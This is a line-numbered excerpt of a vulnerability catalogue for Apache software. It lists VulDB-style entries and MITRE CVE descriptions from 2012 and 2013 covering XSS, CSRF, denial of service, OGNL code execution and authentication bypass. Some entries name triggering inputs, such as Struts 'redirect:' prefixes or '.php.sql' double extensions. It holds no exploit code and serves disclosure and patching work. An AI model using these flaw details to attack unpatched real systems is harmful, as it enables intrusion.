12274| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
12275| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
12276| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
12277| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
12278| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
12279| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
12280| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
12281| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
12282| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
12283| [54693] Apache Traffic Server DNS Cache unknown vulnerability
12284| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
12285| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
12286| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
12287| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
12288| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
12289| [54012] Apache Tomcat up to 6.0.10 denial of service
12290| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
12291| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
12292| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
12293| [52894] Apache Tomcat up to 6.0.7 information disclosure
12294| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
12295| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
12296| [52786] Apache Open For Business Project up to 09.04 cross site scripting
12297| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
12298| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
12299| [52584] Apache CouchDB up to 0.10.1 information disclosure
12300| [51757] Apache HTTP Server 2.0.44 cross site scripting
12301| [51756] Apache HTTP Server 2.0.44 spoofing
12302| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
12303| [51690] Apache Tomcat up to 6.0 directory traversal
12304| [51689] Apache Tomcat up to 6.0 information disclosure
12305| [51688] Apache Tomcat up to 6.0 directory traversal
12306| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
12307| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
12308| [50626] Apache Solr 1.0.0 cross site scripting
12309| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
12310| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
12311| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
12312| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
12313| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
12314| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
12315| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
12316| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
12317| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
12318| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
12319| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
12320| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
12321| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
12322| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
12323| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
12324| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
12325| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
12326| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
12327| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
12328| [47214] Apachefriends xampp 1.6.8 spoofing
12329| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
12330| [47162] Apachefriends XAMPP 1.4.4 weak authentication
12331| [47065] Apache Tomcat 4.1.23 cross site scripting
12332| [46834] Apache Tomcat up to 5.5.20 cross site scripting
12333| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
12334| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
12335| [86625] Apache Struts directory traversal
12336| [44461] Apache Tomcat up to 5.5.0 information disclosure
12337| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
12338| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
12339| [43663] Apache Tomcat up to 6.0.16 directory traversal
12340| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
12341| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
12342| [43516] Apache Tomcat up to 4.1.20 directory traversal
12343| [43509] Apache Tomcat up to 6.0.13 cross site scripting
12344| [42637] Apache Tomcat up to 6.0.16 cross site scripting
12345| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
12346| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
12347| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
12348| [40924] Apache Tomcat up to 6.0.15 information disclosure
12349| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
12350| [40922] Apache Tomcat up to 6.0 information disclosure
12351| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
12352| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
12353| [40656] Apache Tomcat 5.5.20 information disclosure
12354| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
12355| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
12356| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
12357| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
12358| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
12359| [40234] Apache Tomcat up to 6.0.15 directory traversal
12360| [40221] Apache HTTP Server 2.2.6 information disclosure
12361| [40027] David Castro Apache Authcas 0.4 sql injection
12362| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
12363| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
12364| [3414] Apache Tomcat WebDAV Stored privilege escalation
12365| [39489] Apache Jakarta Slide up to 2.1 directory traversal
12366| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
12367| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
12368| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
12369| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
12370| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
12371| [38524] Apache Geronimo 2.0 unknown vulnerability
12372| [3256] Apache Tomcat up to 6.0.13 cross site scripting
12373| [38331] Apache Tomcat 4.1.24 information disclosure
12374| [38330] Apache Tomcat 4.1.24 information disclosure
12375| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
12376| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
12377| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
12378| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
12379| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
12380| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
12381| [37292] Apache Tomcat up to 5.5.1 cross site scripting
12382| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
12383| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
12384| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
12385| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
12386| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
12387| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
12388| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
12389| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
12390| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
12391| [36225] XAMPP Apache Distribution 1.6.0a sql injection
12392| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
12393| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
12394| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
12395| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
12396| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
12397| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
12398| [34252] Apache HTTP Server denial of service
12399| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
12400| [33877] Apache Opentaps 0.9.3 cross site scripting
12401| [33876] Apache Open For Business Project unknown vulnerability
12402| [33875] Apache Open For Business Project cross site scripting
12403| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
12404| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
12405|
12406| MITRE CVE - https://cve.mitre.org:
12407| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
12408| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
12409| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
12410| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
12411| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
12412| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
12413| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
12414| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
12415| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
12416| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
12417| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
12418| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
12419| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
12420| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
12421| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
12422| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
12423| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
12424| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
12425| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
12426| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
12427| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
12428| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
12429| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
12430| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
12431| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
12432| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
12433| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
12434| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
12435| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
12436| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
12437| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12438| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
12439| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
12440| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
12441| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
12442| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
12443| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
12444| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
12445| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
12446| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
12447| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
12448| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12449| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12450| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12451| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12452| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
12453| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
12454| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
12455| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
12456| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
12457| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
12458| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
12459| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
12460| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
12461| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
12462| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
12463| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
12464| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
12465| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
12466| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
12467| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
12468| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
12469| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
12470| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
12471| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12472| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
12473| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
12474| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
12475| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
12476| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
12477| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
12478| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
12479| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
12480| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
12481| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
12482| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
12483| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
12484| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
12485| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
12486| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
12487| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
12488| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
12489| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
12490| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
12491| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
12492| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
12493| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
